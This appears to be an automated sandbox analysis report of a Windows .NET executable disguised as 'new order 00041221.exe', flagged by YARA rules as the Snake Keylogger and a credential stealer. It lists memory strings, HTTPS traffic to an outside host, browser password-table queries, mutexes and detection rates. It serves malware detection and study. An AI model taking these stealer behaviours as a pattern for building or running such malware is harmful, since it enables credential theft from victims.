                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003096000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/0
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    .NET source code contains very large array initializations
                    Source: new order 00041221.exe, BaseTypeRequiredAttribute.csLarge array initialization: : array initializer size 620175
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: new order 00041221.exe
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04C86F4C1_2_04C86F4C
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04C83E3C1_2_04C83E3C
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04C858581_2_04C85858
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04C858681_2_04C85868
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04C878101_2_04C87810
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04DD65D01_2_04DD65D0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04DDE4F41_2_04DDE4F4
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04DD73281_2_04DD7328
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04DF75C01_2_04DF75C0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04DF46401_2_04DF4640
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04DFB2501_2_04DFB250
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04DFB2601_2_04DFB260
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_04DF3B601_2_04DF3B60
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B772401_2_06B77240
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B700401_2_06B70040
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B746B01_2_06B746B0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B746A21_2_06B746A2
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B772401_2_06B77240
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B72FD81_2_06B72FD8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B734101_2_06B73410
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B734001_2_06B73400
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B7A2901_2_06B7A290
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B74AE81_2_06B74AE8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B74AD81_2_06B74AD8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B72BA01_2_06B72BA0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B72B801_2_06B72B80
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 1_2_06B700061_2_06B70006
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127C1463_2_0127C146
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127A0883_2_0127A088
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_012753623_2_01275362
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127D2CA3_2_0127D2CA
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127D5993_2_0127D599
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127C4683_2_0127C468
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127C7383_2_0127C738
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_012769A03_2_012769A0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_012729E03_2_012729E0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127CD283_2_0127CD28
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127EC183_2_0127EC18
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127CFF73_2_0127CFF7
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_01276FC83_2_01276FC8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127F7F13_2_0127F7F1
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127EC0A3_2_0127EC0A
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_0127FC483_2_0127FC48
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_01273E093_2_01273E09
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A397B03_2_05A397B0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A352903_2_05A35290
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A39ED83_2_05A39ED8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3F1B93_2_05A3F1B9
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A395903_2_05A39590
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A38DF93_2_05A38DF9
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3F1C83_2_05A3F1C8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3E9083_2_05A3E908
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3E9183_2_05A3E918
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A329703_2_05A32970
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3ED703_2_05A3ED70
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3E4B33_2_05A3E4B3
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3E4C03_2_05A3E4C0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A300233_2_05A30023
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3DC013_2_05A3DC01
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3DC103_2_05A3DC10
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3E0683_2_05A3E068
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A300403_2_05A30040
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3E0593_2_05A3E059
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A31BA83_2_05A31BA8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3D7B83_2_05A3D7B8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A31B973_2_05A31B97
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A30B203_2_05A30B20
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A30B303_2_05A30B30
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3CF083_2_05A3CF08
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3D3603_2_05A3D360
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A352803_2_05A35280
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A322883_2_05A32288
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3F6203_2_05A3F620
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A38E083_2_05A38E08
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3F6103_2_05A3F610
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3FA6B3_2_05A3FA6B
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A39E693_2_05A39E69
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A3FA783_2_05A3FA78
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A322783_2_05A32278
                    Source: new order 00041221.exe, 00000001.00000002.1269553878.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1278242473.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271292903.0000000002851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271292903.00000000028AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1277540501.0000000004E00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000000.1238190903.0000000000338000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJUWJ.exe2 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003A2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000003.00000002.3708230795.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
                    Source: new order 00041221.exeBinary or memory string: OriginalFilenameJUWJ.exe2 vs new order 00041221.exe
                    Source: new order 00041221.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: new order 00041221.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -A.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -A.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.csSecurity API names: _0020.AddAccessRule
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WWoXcRNneectu4WPwU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.csSecurity API names: _0020.AddAccessRule
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WWoXcRNneectu4WPwU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@6/4
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new order 00041221.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\new order 00041221.exeMutant created: \Sessions\1\BaseNamedObjects\EcCdSAIhNcVisQpsLrNIP
                    Source: new order 00041221.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: new order 00041221.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\new order 00041221.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.000000000318D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000315B000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000313D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000314D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003180000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: new order 00041221.exeVirustotal: Detection: 41%
                    Source: new order 00041221.exeReversingLabs: Detection: 47%
                    Source: unknownProcess created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
